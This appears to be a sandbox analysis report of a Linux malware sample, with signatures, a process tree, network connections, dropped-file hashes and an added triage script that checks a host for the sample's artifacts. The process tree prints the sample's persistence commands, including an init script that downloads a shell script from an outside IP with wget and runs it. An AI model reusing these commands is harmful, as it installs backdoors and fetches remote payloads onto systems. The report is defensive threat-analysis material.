Analysis Overview
SHA256
35cd367a1fb9c6d29e748b51e42ed8ceee321a1f874aafacc4af3e663049234f
Threat Level: Known bad
The file 19991040084.zip was found to be: Known bad.
Malicious Activity Summary
yara_template
File and Directory Permissions Modification
Modifies Watchdog functionality
Checks mountinfo of local process
Creates/modifies environment variables
Modifies init.d
Modifies rc script
Modifies systemd
Modifies Bash startup script
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-25 09:14
Signatures
yara_template
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-25 09:14
Reported
2024-11-25 09:17
Platform
ubuntu2404-amd64-20240729-en
Max time kernel
148s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
| N/A | N/A | /usr/bin/chmod | N/A |
| N/A | N/A | /bin/sh | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Checks mountinfo of local process
| Description | Indicator | Process | Target |
| File opened for reading | /proc/2655/mountinfo | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/system | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for modification | /etc/init.d/sh | /bin/sh | N/A |
Modifies rc script
| Description | Indicator | Process | Target |
| File opened for modification | /etc/rc.local | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies systemd
| Description | Indicator | Process | Target |
| File opened for modification | /etc/systemd/system/custom.service | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /etc/profile | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/status | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for reading | /proc/1/cgroup | /tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911 | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/systemctl | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/mkdir | N/A |
Processes
/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911
[/tmp/e4c012d14546fb6fa83fdd580a58eaf10e69547189a3b6efecb6ea0ce9dd3911]
/bin/sh
[sh -c systemctl enable custom.service >/dev/null 2>&1]
/usr/bin/systemctl
[systemctl enable custom.service]
/bin/sh
[sh -c chmod +x /etc/init.d/system >/dev/null 2>&1]
/usr/bin/chmod
[chmod +x /etc/init.d/system]
/bin/sh
[sh -c ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1]
/usr/bin/ln
[ln -s /etc/init.d/system /etc/rcS.d/S99system]
/bin/sh
[sh -c echo "#!/bin/sh
# /etc/init.d/sh
case \"$1\" in
  start)
    echo 'Starting sh'
    /bin/sh &
    wget http://193.143.1.70/ -O /tmp/lol.sh
    chmod +x /tmp/lol.sh
    /tmp/lol.sh &
    ;;
  stop)
    echo 'Stopping sh'
    killall sh
    ;;
  restart)
    $0 stop
    $0 start
    ;;
  *)
    echo \"Usage: $0 {start|stop|restart}\"
    exit 1
    ;;
esac
exit 0" > /etc/init.d/sh]
/bin/sh
[sh -c chmod +x /etc/init.d/sh >/dev/null 2>&1]
/usr/bin/chmod
[chmod +x /etc/init.d/sh]
/bin/sh
[sh -c mkdir -p /etc/rc.d >/dev/null 2>&1]
/usr/bin/mkdir
[mkdir -p /etc/rc.d]
/bin/sh
[sh -c ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1]
/usr/bin/ln
[ln -s /etc/init.d/sh /etc/rc.d/S99sh]
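A host-side check for the persistence this process tree establishes, added here as an example; it is not part of the sandbox report or of the sample. It walks a root filesystem (live `/` or a mounted disk image) for the files the process list shows being created (the systemd unit, the two init.d scripts and their rc symlinks) and greps the legitimate startup files the signatures show being opened for modification (`/etc/profile`, `/etc/rc.local`, `/etc/inittab`, `/boot/bootcmd`) for strings taken from the report. The paths and strings come from the Processes, Signatures and Files sections; the `check_persistence` function name and the `SUSPECT`/`IOC` output format are this example's own. Note that `/etc/rc.d` is not consulted by Debian-style init, so on the Ubuntu detonation host the `S99sh` symlink is inert, but its presence is still a clean indicator.

```shell
#!/bin/sh
# Triage for the persistence artifacts listed in this report.
# Added example, not part of the sandbox report or the sample.
# Usage: sh triage.sh [ROOT]   where ROOT is / or a mounted disk image.
# Artifact paths and IOC strings are copied from the report; the output
# format (SUSPECT/IOC lines) and function names are this script's own.

# Files the sample creates. None of these exist on a stock Ubuntu install,
# so their mere presence is a finding.
DROPPED="etc/systemd/system/custom.service
etc/init.d/system
etc/init.d/sh
etc/rcS.d/S99system
etc/rc.d/S99sh"

# Legitimate boot/login files the sample opened for modification. Only their
# contents separate a clean copy from a backdoored one, so grep them for
# strings that appear in the dropped init script and process list.
MODIFIED="etc/profile
etc/rc.local
etc/inittab
boot/bootcmd"

IOCS="193.143.1.70 /tmp/lol.sh /etc/init.d/sh /etc/init.d/system custom.service"

# SHA-256 of a regular file, for comparison with the Files section hashes.
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Prints one line per finding; returns 0 if clean, 1 if anything was found.
check_persistence() {
    root="${1:-/}"
    root="${root%/}"
    hits=0
    for rel in $DROPPED; do
        p="$root/$rel"
        if [ -L "$p" ]; then
            # Report the link target even if it dangles (the sample links
            # /etc/rc.d/S99sh before /etc/init.d/sh has to exist).
            echo "SUSPECT $p -> $(readlink "$p")"
            hits=$((hits + 1))
        elif [ -f "$p" ]; then
            echo "SUSPECT $p $(hash_file "$p")"
            hits=$((hits + 1))
        fi
    done
    for rel in $MODIFIED; do
        p="$root/$rel"
        [ -f "$p" ] || continue
        for ioc in $IOCS; do
            if grep -F -q -e "$ioc" "$p"; then
                echo "IOC $p $ioc"
                hits=$((hits + 1))
            fi
        done
    done
    [ "$hits" -eq 0 ]
}

# Only scan when a root is given explicitly, so sourcing the file is inert.
if [ "$#" -gt 0 ]; then
    check_persistence "$1"
fi
```

Run it as `sh triage.sh /` on a suspect host or `sh triage.sh /mnt/image` against a mounted image; a non-zero exit status means at least one finding was printed. Hashes printed for `SUSPECT` files can be compared directly against the SHA256 values in the Files section of this report. The `/dev/watchdog` and `/proc` accesses the signatures list are runtime behaviour and leave nothing on disk, so this check does not cover them.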
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 154.216.19.139:199 | | tcp |
| US | 154.216.19.139:199 | | tcp |
| US | 154.216.19.139:199 | | tcp |
| RU | 193.143.1.70:38242 | | tcp |
| US | 166.221.116.6:23 | | tcp |
| JP | 126.40.23.30:23 | | tcp |
| DE | 94.219.168.205:23 | | tcp |
| SG | 170.165.2.86:23 | | tcp |
| NL | 83.96.228.126:23 | | tcp |
| JP | 202.244.30.63:23 | | tcp |
| US | 162.236.109.110:23 | | tcp |
| UA | 95.133.98.202:23 | | tcp |
| LT | 158.129.189.242:23 | | tcp |
| CA | 20.116.227.186:23 | | tcp |
| US | 12.248.212.11:23 | | tcp |
| QA | 89.211.5.75:23 | | tcp |
| US | 32.107.0.197:23 | | tcp |
| CA | 64.10.68.86:23 | | tcp |
| GB | 2.123.80.70:23 | | tcp |
| US | 169.94.192.89:23 | | tcp |
| TH | 115.87.169.192:23 | | tcp |
| US | 66.94.65.23:23 | | tcp |
| US | 7.223.141.230:23 | | tcp |
| US | 50.168.146.255:23 | | tcp |
| DE | 2.174.123.99:23 | | tcp |
| TW | 34.81.97.21:23 | | tcp |
| US | 153.59.50.201:23 | | tcp |
| US | 170.97.182.53:23 | | tcp |
| IT | 45.205.17.68:23 | | tcp |
| US | 71.26.7.137:23 | | tcp |
| KR | 169.217.198.60:23 | | tcp |
| US | 168.207.146.101:23 | | tcp |
| TW | 111.252.41.220:23 | | tcp |
| US | 134.150.237.12:23 | | tcp |
| JP | 210.88.114.210:23 | | tcp |
| GB | 109.234.225.10:23 | | tcp |
| GB | 90.214.188.164:23 | | tcp |
| JP | 118.236.246.228:23 | | tcp |
| US | 55.185.57.127:23 | | tcp |
| CN | 113.87.157.50:23 | | tcp |
| US | 76.86.186.216:23 | | tcp |
| JP | 126.24.240.187:23 | | tcp |
| US | 97.99.30.139:23 | | tcp |
| FR | 195.220.72.202:23 | | tcp |
| US | 130.207.137.55:23 | | tcp |
Files
/etc/systemd/system/custom.service
| MD5 | 19a440fdac7f578f2fb33719698a082c |
| SHA1 | ebadce21c65d05ad62a324deb39c57aecd3edf2c |
| SHA256 | b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69 |
| SHA512 | 8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb |
/etc/inittab
| MD5 | 3d6b6e1b05ad5d0538ccd8804bcd279b |
| SHA1 | 0fc061b51c225d5bea072c939de05e8a856558bc |
| SHA256 | cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5 |
| SHA512 | 1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98 |
/boot/bootcmd
| MD5 | 735cae7d3cbab0f59d95f84790282103 |
| SHA1 | 1cb77931b3097f18988016c9ceba3280a5ccb2ae |
| SHA256 | dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b |
| SHA512 | 998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe |
/etc/init.d/system
| MD5 | f000251d92c773cc3ee1ca22cf5f0788 |
| SHA1 | e2386fe6a5f29b1e9e5ad5b38928c024f97105e6 |
| SHA256 | 31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985 |
| SHA512 | 0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2 |
/etc/init.d/sh
| MD5 | c5583b6a699f62cb0a004c99842f5c70 |
| SHA1 | b232ef89bf9b36643b5956aaacfd295b9ce2a0a7 |
| SHA256 | 2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b |
| SHA512 | a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d |
/etc/motd
| MD5 | 2bd9b4be30579e633fc0191aa93df486 |
| SHA1 | 7d63a9bd9662e86666b27c1b50db8e7370c624ff |
| SHA256 | 64dc39f3004dc93c9fc4f1467b4807f2d8e3eb0bfa96b15c19cd8e7d6fa77a1d |
| SHA512 | ae6dd7b39191354cf43cf65e517460d7d4c61b8f5c08e33e6ca3c451dc7cab4de89f33934c89396b80f1aade0a4e2571bd5ae8b76ef80b737d4588703d2814d5 |